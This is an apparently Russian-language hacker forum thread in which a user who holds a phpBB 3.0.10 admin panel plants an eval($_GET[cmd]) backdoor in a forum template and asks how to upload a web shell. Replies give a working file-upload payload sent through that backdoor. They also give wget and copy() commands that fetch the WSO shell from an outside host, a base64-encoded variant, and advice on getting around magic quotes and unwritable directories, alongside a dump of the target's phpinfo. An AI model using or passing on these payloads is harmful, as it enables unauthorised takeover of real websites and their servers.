phpBB 3.0.10 Помогите залить шелл

В общем есть доступ в админку
пробую залить шелл через правку шаблона
вставляю код <!-- PHP --> eval($_GET[cmd]); <!-- ENDPHP -->
проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает
А вот когда пытаюсь залить шелл он почему то не заливается
делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку подскажите как ещё я могу залить шелл

 

Попробуй так:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

шелл будет лежать site.ru/forum/название_закачиваемого_файла.php

 

да просто всегда так заливал!

copy("http://сайт/wso.txt","2.php"); - не работает

file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает

и это тоже не работает
?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt");
далее
?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php");

 

eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBocCIpOw))%3b ??


Да быть такого не может чтобы через wget не заливалось...

 

Не много тебя не до понял
site.ru/forum/название_закачиваемого_файла.php
а где мне название это написать?

 

закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php

 

Так тоже не работает((

 

так ты запрос изменил под себя я надеюсь ?

Если что в личку кинь, посмотрю

 

я когда вот так делаю

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

у меня нечего не происходит

 

Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".

 

я видел тут несколько людей с экстрасенсорными способностями, только они оффлайн... phpinfo кинь...

 

скинь директивы пхпинфо сюда

disabled_functions, safe_mode, allow_url_fopen и тп..

проверь папку на вритабельность, запиши сначала шелл в тмп, попробуй инклудить

возможно mq включено, используй stripslashes в бекдоре

2 Охотник

string base64_decode ( string $data [, bool $strict = false ] )

ponel?

 

блин просто не увидел форму для загрузки файлов
но когда попробовал залить через неё у меня он походу не залился не фига

 

вот небольшой кусок phpinfo
Directive Local Value Master Value
allow_call_time_pass_reference Off Off
allow_url_fopen On On
allow_url_include Off Off
always_populate_raw_post_data Off Off
arg_separator.input & &
arg_separator.output & &
asp_tags Off Off
auto_append_file no value no value
auto_globals_jit On On
auto_prepend_file no value no value
browscap no value no value
default_charset no value no value
default_mimetype text/html text/html
define_syslog_variables Off Off
detect_unicode On On
disable_classes no value no value
disable_functions no value no value
display_errors Off Off
display_startup_errors Off Off
doc_root no value no value
docref_ext no value no value
docref_root no value no value
enable_dl On On
error_append_string no value no value
error_log no value no value
error_prepend_string no value no value
error_reporting 6135 0
expose_php On On
extension_dir /usr/local/lib/php/20060613 /usr/local/lib/php/20060613
file_uploads On On
highlight.bg #FFFFFF #FFFFFF
highlight.comment #FF8000 #FF8000
highlight.default #0000BB #0000BB
highlight.html #000000 #000000
highlight.keyword #007700 #007700
highlight.string #DD0000 #DD0000
html_errors On On
ignore_repeated_errors Off Off
ignore_repeated_source Off Off
ignore_user_abort Off Off
implicit_flush Off Off
include_path .:/usr/local/share/pear .:/usr/local/share/pear
log_errors On On
log_errors_max_len 1024 1024
magic_quotes_gpc On On
magic_quotes_runtime Off Off
magic_quotes_sybase Off Off
mail.force_extra_parameters no value no value
max_execution_time 90 90
max_file_uploads 20 20
max_input_nesting_level 64 64
max_input_time 60 60
memory_limit 192M 192M
open_basedir /home/www/site.ru/public_html/:/var/tmp/:/tmp/ no value
output_buffering 4096 4096
output_handler no value no value
post_max_size 100M 100M
precision 14 14
realpath_cache_size 16K 16K
realpath_cache_ttl 120 120
register_argc_argv Off Off
register_globals Off Off
register_long_arrays Off Off
report_memleaks On On
report_zend_debug On On
safe_mode Off Off
safe_mode_exec_dir no value no value
safe_mode_gid Off Off
safe_mode_include_dir no value no value
sendmail_from no value no value
sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i
serialize_precision 100 100
short_open_tag On On
SMTP localhost localhost
smtp_port 25 25
sql.safe_mode Off Off
suhosin.log.phpscript 0 0
suhosin.log.phpscript.is_safe Off Off
suhosin.log.phpscript.name no value no value
suhosin.log.sapi no value no value
suhosin.log.script no value no value
suhosin.log.script.name no value no value
suhosin.log.syslog no value no value
suhosin.log.syslog.facility no value no value
suhosin.log.syslog.priority no value no value
suhosin.log.use-x-forwarded-for Off Off
track_errors Off Off
unserialize_callback_func no value no value
upload_max_filesize 100M 100M
upload_tmp_dir no value no value
user_dir no value no value
variables_order GPCS GPCS
xmlrpc_error_number 0 0
xmlrpc_errors Off Off
y2k_compliance On On
zend.ze1_compatibility_mode Off Off

 

Проблема не решена((
Кто ещё чем может помочь?

 

скорее всего прав не хватает,попробуй в другую диру залится

 

много папок перепробовал
но без результатно

 

Однако я не очень это понял(( в icq ответь
или объясни здесь по подробней